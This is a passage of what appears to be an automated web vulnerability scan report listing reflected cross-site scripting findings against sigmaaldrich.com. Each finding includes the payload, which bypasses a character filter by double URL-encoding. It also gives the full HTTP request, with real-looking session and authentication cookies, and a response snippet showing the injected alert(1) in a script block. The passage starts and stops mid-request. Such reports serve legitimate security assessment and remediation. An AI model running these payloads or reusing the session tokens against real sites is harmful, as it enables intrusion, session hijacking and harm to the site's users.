Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:50 GMT
Content-Length: 28952
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/sigma-aldrich/sociale6e6a";alert(1)//a9092da1e1a/linkedin-25x25","E404") ;
   </script>
...[SNIP]...

1.482. http://www.sigmaaldrich.com/etc/medialib/sigma-aldrich/social/linkedin-25x25 [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/sigma-aldrich/social/linkedin-25x25

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c10d6%2522%253balert%25281%2529%252f%252fb8b03b340a8 was submitted in the REST URL parameter 5. This input was echoed as c10d6";alert(1)//b8b03b340a8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/sigma-aldrich/social/linkedin-25x25c10d6%2522%253balert%25281%2529%252f%252fb8b03b340a8 HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:53 GMT
Content-Length: 28952
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/sigma-aldrich/social/linkedin-25x25c10d6";alert(1)//b8b03b340a8","E404") ;
   </script>
...[SNIP]...

1.483. http://www.sigmaaldrich.com/etc/medialib/sigma-aldrich/social/twitter-25x25 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/sigma-aldrich/social/twitter-25x25

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a9622%2522%253balert%25281%2529%252f%252fa28c336cd85 was submitted in the REST URL parameter 1. This input was echoed as a9622";alert(1)//a28c336cd85 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etca9622%2522%253balert%25281%2529%252f%252fa28c336cd85/medialib/sigma-aldrich/social/twitter-25x25 HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:37 GMT
Content-Length: 28951
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etca9622";alert(1)//a28c336cd85/medialib/sigma-aldrich/social/twitter-25x25","E404") ;
   </script>
...[SNIP]...

1.484. http://www.sigmaaldrich.com/etc/medialib/sigma-aldrich/social/twitter-25x25 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/sigma-aldrich/social/twitter-25x25

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8556a%2522%253balert%25281%2529%252f%252f1fa9e72b184 was submitted in the REST URL parameter 2. This input was echoed as 8556a";alert(1)//1fa9e72b184 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib8556a%2522%253balert%25281%2529%252f%252f1fa9e72b184/sigma-aldrich/social/twitter-25x25 HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:39 GMT
Content-Length: 28951
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib8556a";alert(1)//1fa9e72b184/sigma-aldrich/social/twitter-25x25","E404") ;
   </script>
...[SNIP]...

1.485. http://www.sigmaaldrich.com/etc/medialib/sigma-aldrich/social/twitter-25x25 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/sigma-aldrich/social/twitter-25x25

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8e978%2522%253balert%25281%2529%252f%252f4e81ba8cf40 was submitted in the REST URL parameter 3. This input was echoed as 8e978";alert(1)//4e81ba8cf40 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/sigma-aldrich8e978%2522%253balert%25281%2529%252f%252f4e81ba8cf40/social/twitter-25x25 HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:41 GMT
Content-Length: 28951
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/sigma-aldrich8e978";alert(1)//4e81ba8cf40/social/twitter-25x25","E404") ;
   </script>
...[SNIP]...

1.486. http://www.sigmaaldrich.com/etc/medialib/sigma-aldrich/social/twitter-25x25 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/sigma-aldrich/social/twitter-25x25

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4b5db%2522%253balert%25281%2529%252f%252f422503a5bc0 was submitted in the REST URL parameter 4. This input was echoed as 4b5db";alert(1)//422503a5bc0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/sigma-aldrich/social4b5db%2522%253balert%25281%2529%252f%252f422503a5bc0/twitter-25x25 HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
